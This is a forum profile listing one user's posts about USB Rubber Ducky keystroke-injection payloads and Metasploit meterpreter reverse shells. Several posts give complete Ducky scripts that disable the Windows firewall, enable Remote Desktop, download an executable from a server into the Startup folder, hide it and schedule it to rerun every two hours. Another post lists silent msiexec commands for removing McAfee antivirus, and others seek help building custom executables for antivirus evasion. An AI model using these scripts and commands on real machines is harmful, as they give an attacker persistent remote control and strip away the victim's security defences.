Jump to content

TeCHemically

Active Members
  • Posts

    131
  • Joined

  • Last visited

Everything posted by TeCHemically

  1. Tried it again and I get the following. It is acting like the shell is there but I cannot interact at all. In fact the shell is acting like it is on the perimeter not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp? exploit(handler) > exploit -j [*] Exploit running as background job. [*] Starting the payload handler... [*] <Public IP address>:60476 Request received for /JuQL... [*] <Public IP address>:60476 Staging connection for target /JuQL received... [*] Patched user-agent at offset 657384... [*] Patched transport at offset 657044... [*] Patched URL at offset 657112... [*] Patched Expiration Timeout at offset 657868... [*] Patched Communication Timeout at offset 657984... [*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500
  2. I started the 32 bit listener and created the fxsst.dll with a 32bit reverse_https payload. When it runs I get the following on my listening machine: Starting the payload handler... [*] <IP address>:5465 Request received for /JuQL... [*] <IP address>:5465 Staging connection for target /JuQL received... [*] Patched user-agent at offset 657384... [*] Patched transport at offset 657044... [*] Patched URL at offset 657112... [*] Patched Expiration Timeout at offset 657868... [*] Patched Communication Timeout at offset 657984... [*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500 [-] Failed to load extension: No response was received to the core_loadlib request.
  3. Very nice! I am having issues though. When the powershell command is entered a ton of red text flies by and the window disappears. No shell results. Sorry I don't have more information. Any help and direction is appreciated!
  4. Ok, after further testing this seems to be begin caused by read write errors likely associated with the ducky drive not unmounting correctly. No matter if I dismount from windows explorer or the system tray, it still stays visible and navigable in the windows explorer window. I have told it to dismount from the explorer window and the system tray many times and it always throws up the "safe to remove" balloon; but alas, once I do remove it I get alternating fast and slow red clinking and not drive mount or code execution on the twin duck whenever it is inserted into any client. I have reflashed the firmware to no avail. Is any one else having these SD card corruption/dismount errors? EDIT: putting the "inject.bin" file on the root with 2 other file folders causes this thing to fail. If I remove the inject.bin I am able to mount ducky storage. So with any payload on it the thing totally fails. With no payload the storage will mount. If I have the payload there but named incorrectly then I still have access to the storage. I am only seeing this failure now with the payload on the root of the SD named properly (inject.bin).
  5. I am very interested in this as well. I was looking at scriptjunkie's article "Why Encoding Does not Matter and How Metasploit Generates EXEs" and was wondering how I could implement the c output of my custom shellcode into a custom or pre-existing exe. Any resources and/or advice is greatly appreciated!
  6. scriptjunkie detailed this type of thing in an article on his site called "Why Encoding Does not Matter and How Metasploit Generates EXEs". So, should I attempt to modify an existing exe or is is simpler to create my own for this purpose?
  7. I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe/ exe template that I can use for AV evasion? I have a thread on this started under security if you could shed some light that would be amazing, thanks for all your help! :)
  8. I would like to know if there is a way to generate random exe templates for injecting custom shellcode into; just like msf pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer so this will need to be VERY good instruction for me to be able to follow. I am willing to learn but I am very inexperienced here. I basically need to be able to create my own custom/random exe template then know how to add the custom shellcode into it that is created by msfvenom's output so that it runs. Thanks to all who help!
  9. So, I have to ask. Since you have "I remember" playing on that vid. Do you recognize my avatar?
  10. Beautiful, great work man! I just watched your vid. You have yourself another subscriber.
  11. I am having issues with msfvenom though. Using msfpayload and piping into msfencode worked to create the aforementioned dll but I don't see the options I need in the help of msfvenom.
  12. So to start the handler would I use the following: use exploit/multi/handler set LHOST 0.0.0.0 set LPORT 443 set PAYLOAD windows/windows/x64/meterpreter/reverse_https set ExitOnSession false exploit -j
  13. You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D
  14. After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got not change. I checked the SD cards on 2 other PCs (one linux one windows) and on the windows PC I got "I/O" errors in the pop up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)
  15. I am also having issues with Twin Duck original firmware. It has been functional through my testing today but just about a half hour ago the DUCKY storage drive no longer mounts and the inject.bin does not run either. Tried on 2 PCs. I get an alternating fast and slow red LED flashing on one PC and I get no lights at all on the other. The storage will mount if I put the SD card in another reader.
  16. I found the following little tid bit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D VirusScan Enterprise (VSE) command line removal using msiexec.exe: Click Start, Run. Type the removal string for your version of VSE, then click OK. VirusScan Enterprise 8.8 msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.7i msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.5i msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.0i msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q Switches that you can use with msiexec.exe: /q The quiet switch ensures the removal is done silently - nothing is displayed. /x This switch will automatically remove an installation. /i This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation. /? This switch provides additional information on all msiexec.exe command switches.
  17. Thanks for the help! :) Can the 64bit https meterpreter shell run on a 32 bit machine? Also, I generated the above mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64 bit by default or is there a part of the command I missed that will create the 64 bit shell? Thanks again, this is a great method!
  18. Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connetion being so noticable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thakns again!
  19. Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management". DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER DELAY 300 STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" ENTER DELAY 300 STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2 ENTER DELAY 300 STRING y ENTER STRING exit ENTER
  20. This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D ****************************************************************************************************************************** DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER STRING exit ENTER ****************************************************************************************************************************** You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands: cd /usr/share/ducky/encoder (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in) java -jar encoder.jar -i payload.txt -o inject.bin (now place the "inject.bin" file on your ducky and use as you normally would)
  21. Everything appears to have been successful on the client side; but I dont get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue. EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.
  22. No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :)
  23. Great script, I am super excited to test this one out :D One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error: [*] Generating shellcode /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT) from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen' from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>' Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)
×
×
  • Create New...